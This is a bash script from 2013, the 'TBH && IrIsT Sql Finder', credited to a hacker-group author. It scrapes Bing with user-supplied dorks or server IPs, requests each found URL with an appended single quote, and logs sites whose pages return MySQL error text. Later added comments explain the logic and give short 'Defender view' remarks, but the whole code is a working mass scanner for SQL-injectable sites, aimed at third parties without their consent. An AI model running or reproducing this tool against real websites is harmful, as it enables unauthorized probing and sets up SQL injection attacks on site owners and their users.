
TBH && IrIsT Sql Finder

Author: Beni_Vanda , Published: 24-02-2013
#!/bin/bash
# "***********************************************************************"
# "* In The Name Of ALLAH *"
# "* TBH && IrIsT Sql Finder *"
# "* http://turk-bh.ir/ && http://irist.ir/ *"
# "* Coded By : Beni_Vanda *"
# "* Beni_Vanda@yahoo.com *"
# "***********************************************************************"

################################################################################
#
# Gr33tz : Am!r ,C0dex ,B3HZ4D ,TaK.FaNaR ,0x0ptim0us ,MR.F@RDIN , noob
# skote_vahshat ,Sukhoi Su-37 ,Net.W0lf , rEd X ,x3o-1337 , No PM &&
# m3hdi , Sukhoi Su-71 , IR Anonymous , joker_s , Mr.epsilon ,godfather
# All Turkish/Iranian/Kurdish/Bangladesh Hackerz
#
################################################################################

#######################################
# Interactive scan: read a search "dork" from stdin, collect matching result
# URLs from Bing, then request each candidate URL with a single quote appended
# and look for MySQL error text in the response.
# Globals:   nothing is declared `local`, so page, last_page_check, how_many,
#            single_page, Dorkme, url, dork, str, str2 and the loop variables
#            all remain set in the calling shell afterwards.
# Arguments: none.
# Outputs:   progress lines on stdout; URLs whose response matched one of the
#            two error patterns are appended to sql_finded.txt.
# Files:     fixed-name scratch files in the current directory
#            (domain_bing.php, alldomain_bing.txt, domains.txt, should_test.txt,
#            should_delete.txt, domain_sorted.txt, should_test_sql.txt, sql.php).
#
# Defender view: a probed site receives a request whose URL ends in "'" and
# carries the fixed Firefox 3.0.3 User-Agent string used below. A hit is only
# recorded when the response echoes database error text, so parameterized
# queries together with suppressed error output remove both the flaw and the
# signal this check depends on.
#######################################
function searching_Sql_Bug_With_Dork
{

# Paging state: the while loop below runs while last_page_check and
# single_page are empty and how_many is non-empty.
page=0
last_page_check=
how_many=1
single_page=

echo -e "\e[1;31mPlease Input Dork :\e[0m: ";
# read without -r: backslashes in the typed dork are interpreted by the shell.
read Dorkme;

echo -e "\e[1;32m[*] Searching With $Dorkme Dork plz w8 ...\e[0m"

while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

# The dork is placed into the query string as typed (no URL-encoding), wrapped
# in %27 (an encoded single quote). first=${page}0 yields offsets 00, 10, 20, ...
url="http://www.bing.com/search?q=%27$Dorkme%27&qs=n&pq=%27$Dorkme%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"

wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" "$url"


# Non-empty when the result counter reads "A-B of B" (the backreference \1
# requires the last shown index to equal the total), i.e. the final page.
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

# if no results are found, how_many is empty and the loop will exit
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

# check for a single page of results
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `


# Pull the href of every <h3><a ...> result link. egrep is given the file name,
# so the piped `cat` output is not what it reads.
cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php
let page=$page+1
done

# Normalise the collected URLs: drop http:// and https://, lowercase, sort and
# de-duplicate. The sed expression deletes every match of /www./ (the dot is a
# regex wildcard) on lines that contain one. Output is appended, so entries
# already in domains.txt from an interrupted earlier run are kept.
cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt
rm -f alldomain_bing.txt;


# Keep only the part of the dork before the first '?'.
dork=`echo "$Dorkme" | cut -d '?' -f 1`


# Split results into those that contain the dork prefix (matched as an
# extended regex) and those that do not.
# NOTE(review): lines come from a scraped page and are expanded unquoted in the
# `for ... in` list and in `[ -z $varfor ]`, so they undergo word splitting and
# globbing.
for line_test in `cat domains.txt`
do
varfor=`echo "$line_test" | egrep "$dork"`

if [ -z $varfor ]
then
echo "$line_test" >>should_delete.txt
else
# sort | uniq sees a single line here, so it passes it through unchanged.
echo "$line_test" | sort | uniq >>should_test.txt
fi
done


touch domain_sorted.txt;

# Keep one URL per host: the text before the first '/' is used as an extended
# regex against the URLs kept so far, and the URL is added only when nothing
# matches.
for namedomain in `cat should_test.txt`
do
domaincut=`echo "$namedomain" | cut -d '/' -f 1`
urlgreap=`cat domain_sorted.txt | egrep $domaincut`
if [[ $urlgreap = "" ]]
then
echo "$namedomain" >>domain_sorted.txt
fi
done

# Append a single quote to each URL; this is the probe string requested below.
for varline in `cat domain_sorted.txt`
do
echo "$varline'" | sort | uniq >>should_test_sql.txt
done


# One request per candidate (--tries=1). The scheme was stripped during
# normalisation, so wget receives a bare host/path.
# NOTE(review): $L_domain is scraped text passed to wget and echo unquoted.
for L_domain in `cat should_test_sql.txt`
do

wget -q -O sql.php --tries=1 --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" $L_domain

# The only evidence examined is error text in the response body: the MySQL
# syntax-error message, or a line containing "b>: mysql".
str=`cat "sql.php" | awk '/You have an error in your SQL syntax/ { print }'`
str2=`cat "sql.php" | awk '/b>: mysql/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then

echo -e "\e[1;36m[*] Trying ... >> [*] $L_domain >> Not Vulnerable \e[0m"
else
echo -e "\e[1;35m[*] Trying ... >> Found >> $L_domain \e[0m"
echo $L_domain >>sql_finded.txt
fi

rm -f sql.php
# download.log is not written anywhere in this function.
rm -f download.log
done

# Remove scratch files; sql_finded.txt is left in place. test.txt and
# download.log are removed although this function never creates them.
rm -f should_test_sql.txt
rm -f should_delete.txt
rm -f domains.txt
rm -f sql.php
rm -f test.txt
rm -f download.log
rm -f should_test.txt
rm -f domain_sorted.txt
}

#######################################
# Interactive scan limited to one server: read a host or IP and a dork from
# stdin, use Bing's ip: operator to list indexed URLs on that address that
# match the dork, then request each candidate with a single quote appended and
# look for MySQL error text in the response.
# Globals:   nothing is declared `local`; IP_SERVER, DORK_SERVER, IP, page,
#            url, dork, str, str2 and the loop variables stay set afterwards.
# Arguments: none.
# Outputs:   ping output and progress lines on stdout; matching URLs are
#            appended to sql_finded.txt.
# Exits:     terminates the whole script when the name does not resolve, the
#            host does not answer ping, or the search returned no links.
# Files:     fixed-name scratch files in the current directory.
#
# Defender view: the target host sees three ICMP echo requests, then requests
# whose URL ends in "'" with the fixed Firefox 3.0.3 User-Agent string. A hit
# is only recorded when the response echoes database error text, so
# parameterized queries together with suppressed error output remove both the
# flaw and the signal this check depends on.
#######################################
function Search_On_Server_With_Dork()
{
# Paging state: the while loop below runs while last_page_check and
# single_page are empty and how_many is non-empty.
page=0
last_page_check=
how_many=1
single_page=


echo -e "\e[1;31mPlz input Server IP Or Domain \e[0m: ";
read IP_SERVER
echo -e "\e[1;31mPlz input URL Drok \e[0m: ";
read DORK_SERVER

# The input is used as the address when it contains a dotted quad or a
# bracketed hex/colon group (the pattern is not anchored); otherwise it is
# resolved with resolveip, a helper utility shipped with MySQL/MariaDB.
if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then
IP="$IP_SERVER"
else
IP=`resolveip -s "$IP_SERVER"`
if [ "$?" != 0 ]; then
echo "Error: cannot resolve $IP_SERVER to an IP"
# Bare exit: the status is that of the echo above.
exit
fi
fi


# Check server status: three ICMP echo requests; a non-zero ping status ends
# the script.
ping -c 3 $IP
if [ $? -ne 0 ]
then
echo "Server $IP is down :| >> Program Exit "
exit 1
fi

echo -e "\e[1;35mSearching With $DORK_SERVER on $IP_SERVER Plz W8 \e[0m: ";

while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

# Query is "ip:<IP> '<dork>'" with the colon and quotes percent-encoded; the
# dork itself is inserted as typed. first=${page}1 yields offsets 01, 11, 21, ...
url="http://www.bing.com/search?q=ip%3a$IP+%27$DORK_SERVER%27&qs=n&pq=ip%3a$IP+%27$DORK_SERVER%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"

# No --user-agent here, so this search request goes out with wget's default.
wget -q -O domain_bing.php "$url"

# Non-empty when the result counter reads "A-B of B" (the backreference \1
# requires the last shown index to equal the total), i.e. the final page.
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

# Empty when the page has no result counter, which ends the loop.
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

# Non-empty when the counter shows a single-digit "N results".
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `

# Pull the href of every <h3><a ...> result link. egrep is given the file name,
# so the piped `cat` output is not what it reads.
cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php;
let page=$page+1;
done

# Stop when no links were collected: the size is taken from column 5 of
# `ls -l`. The file exists because the loop above runs at least once and its
# >> redirect creates it.
if [ `ls -l alldomain_bing.txt | awk '{print $5}'` -eq 0 ]
then
echo -e "\e[1;31mNot Found $DORK_SERVER on $IP_SERVER ...\e[0m"
echo -e "\e[1;31mExited !! ...\e[0m"
exit 1
fi

# Normalise the collected URLs: drop http:// and https://, lowercase, sort and
# de-duplicate. The sed expression deletes every match of /www./ (the dot is a
# regex wildcard) on lines that contain one. Output is appended to domains.txt.
cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt
rm -f alldomain_bing.txt;

# Keep only the part of the dork before the first '?'.
dork=`echo "$DORK_SERVER" | cut -d '?' -f 1`

# Split results into those that contain the dork prefix (matched as an
# extended regex) and those that do not (written to d.txt).
# NOTE(review): lines come from a scraped page and are expanded unquoted in the
# `for ... in` list and in `[ -z $varfor2 ]`, so they undergo word splitting
# and globbing.
for line_test_2 in `cat domains.txt`
do
varfor2=`echo "$line_test_2" | egrep "$dork"`

if [ -z $varfor2 ]
then
echo "$line_test_2" >>d.txt
else
# sort | uniq sees a single line here, so it passes it through unchanged.
echo "$line_test_2" | sort | uniq >>should_test.txt
fi
done


touch domain_sorted.txt;

# Keep one URL per host: the text before the first '/' is used as an extended
# regex against the URLs kept so far, and the URL is added only when nothing
# matches.
for namedomain in `cat should_test.txt`
do
domaincut=`echo "$namedomain" | cut -d '/' -f 1`
urlgreap=`cat domain_sorted.txt | egrep $domaincut`
if [[ $urlgreap = "" ]]
then
echo "$namedomain" >>domain_sorted.txt
fi
done

# Append a single quote to each URL; this is the probe string requested below.
for varline in `cat domain_sorted.txt`
do
echo "$varline'" | sort | uniq >>should_test_sql.txt
done


# One request per candidate (--tries=1). The scheme was stripped during
# normalisation, so wget receives a bare host/path.
# NOTE(review): $L_domain is scraped text passed to wget and echo unquoted.
for L_domain in `cat should_test_sql.txt`
do

wget -q -O sql.php --tries=1 --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" $L_domain

# The only evidence examined is error text in the response body: the MySQL
# syntax-error message, or a line containing "b>: mysql".
str=`cat "sql.php" | awk '/You have an error in your SQL syntax/ { print }'`
str2=`cat "sql.php" | awk '/b>: mysql/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then

echo -e "\e[1;36m[*] Trying ... >> [*] $L_domain >> Not Vulnerable \e[0m"
else
echo -e "\e[1;35m[*] Trying ... >> Found >> $L_domain \e[0m"
echo $L_domain >>sql_finded.txt
fi

rm -f sql.php
# download.log is not written anywhere in this function.
rm -f download.log
done
# Remove scratch files; sql_finded.txt is left in place. test.txt and
# download.log are removed although this function never creates them.
rm -f should_test_sql.txt
rm -f should_test.txt
rm -f d.txt
rm -f domains.txt
rm -f domain_sorted.txt
rm -f sql.php
rm -f test.txt
rm -f download.log

}

#######################################
# Collect URLs on one server whose indexed pages contain the text
# "Warning: mysql_": read a host or IP from stdin, query Bing with the ip:
# operator, and write the normalised result URLs to domains.txt.
# This function stops after building domains.txt; it sends no request to the
# listed sites and removes no scratch file other than alldomain_bing.txt.
# The menu in main, as shown on this page, has no entry that calls it.
# Globals:   nothing is declared `local`; IP_SERVER, IP, page, url and the
#            paging variables stay set afterwards. DORK_SERVER is read in the
#            "Not Found" message but never assigned here.
# Arguments: none.
# Outputs:   ping output and progress lines on stdout; domains.txt in the
#            current directory.
# Exits:     terminates the whole script when the name does not resolve, the
#            host does not answer ping, or the search returned no links.
#
# Defender view: the query relies on PHP/MySQL warning text having been served
# to a crawler and indexed. Keeping such warnings out of responses (for
# example with PHP's display_errors turned off) removes what this search looks
# for.
#######################################
function Auto_search_Sql_On_Server()
{

# Paging state: the while loop below runs while last_page_check and
# single_page are empty and how_many is non-empty.
page=0
last_page_check=
how_many=1
single_page=


echo -e "\e[1;31mPlz input Server IP Or Domain \e[0m: ";
read IP_SERVER

# The input is used as the address when it contains a dotted quad or a
# bracketed hex/colon group (the pattern is not anchored); otherwise it is
# resolved with resolveip, a helper utility shipped with MySQL/MariaDB.
if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then
IP="$IP_SERVER"
else
IP=`resolveip -s "$IP_SERVER"`
if [ "$?" != 0 ]; then
echo "Error: cannot resolve $IP_SERVER to an IP"
# Bare exit: the status is that of the echo above.
exit
fi
fi


# Check server status: three ICMP echo requests; a non-zero ping status ends
# the script.
ping -c 3 $IP
if [ $? -ne 0 ]
then
echo "Server $IP is down :| >> Program Exit "
exit 1
fi

echo -e "\e[1;35mSearching on $IP_SERVER Server Plz W8 \e[0m: ";


while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

# Query is "ip:<IP> Warning: mysql_" with the colons percent-encoded.
# first=${page}1 yields offsets 01, 11, 21, ...
url="http://www.bing.com/search?q=ip%3a$IP+Warning%3A+mysql_&qs=n&pq=ip%3a$IP+Warning%3A+mysql_&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"

#http://www.bing.com/search?q=ip%3A83.145.246.156+Warning%3A+mysql_&qs=n&form=QBRE&pq=ip%3A83.145.246.156+warning%3A+mysql_&sc=8-33&sp=-1&sk=

# No --user-agent here, so this search request goes out with wget's default.
wget -q -O domain_bing.php "$url"

# Non-empty when the result counter reads "A-B of B" (the backreference \1
# requires the last shown index to equal the total), i.e. the final page.
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

# Empty when the page has no result counter, which ends the loop.
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

# Non-empty when the counter shows a single-digit "N results".
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `

# Pull the href of every <h3><a ...> result link. egrep is given the file name,
# so the piped `cat` output is not what it reads.
cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php;
let page=$page+1;
done

# Stop when no links were collected: the size is taken from column 5 of
# `ls -l`. $DORK_SERVER in the message is not set by this function, so it
# prints whatever value (if any) an earlier function left in that global.
if [ `ls -l alldomain_bing.txt | awk '{print $5}'` -eq 0 ]
then
echo -e "\e[1;31mNot Found $DORK_SERVER on $IP_SERVER ...\e[0m"
echo -e "\e[1;31mExited !! ...\e[0m"
exit 1
fi

# Normalise the collected URLs: drop http:// and https://, lowercase, sort and
# de-duplicate. The sed expression deletes every match of /www./ (the dot is a
# regex wildcard) on lines that contain one. Output is appended to domains.txt.
cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt
rm -f alldomain_bing.txt;

}


#######################################
# Print the three-entry menu, read one choice from stdin and dispatch on it.
# Globals:   option (written; not declared local, as in the rest of the file)
# Arguments: none
# Outputs:   menu and prompt on stdout
# Returns:   the status of the selected function for choices 1 and 2;
#            exits 0 for choice 3 and exits 1 for any other input.
#######################################
function main()
{
  # Menu text, one entry per element, each wrapped in the yellow colour escape.
  local -a menu_lines=(
    "\e[1;33m1) Searching Sql Bug on Serevr with Dork <IP> <DORK> \e[0m"
    "\e[1;33m2) Searching Sql bug With Dork <DORK> \e[0m"
    "\e[1;33m3) Exit \e[0m"
  )
  local entry

  for entry in "${menu_lines[@]}"; do
    echo -e "$entry"
  done

  echo -e "\e[1;31mPlease select one of the following \e[0m: "
  read option

  # Only the literal answers 1, 2 and 3 are accepted; anything else ends the
  # script with status 1.
  if [[ $option == 1 ]]; then
    Search_On_Server_With_Dork
  elif [[ $option == 2 ]]; then
    searching_Sql_Bug_With_Dork
  elif [[ $option == 3 ]]; then
    exit 0
  else
    echo "Wrong parametr ; Plz try again ..."
    exit 1
  fi
}

# Script entry point: show the menu once and run the selected mode.
main
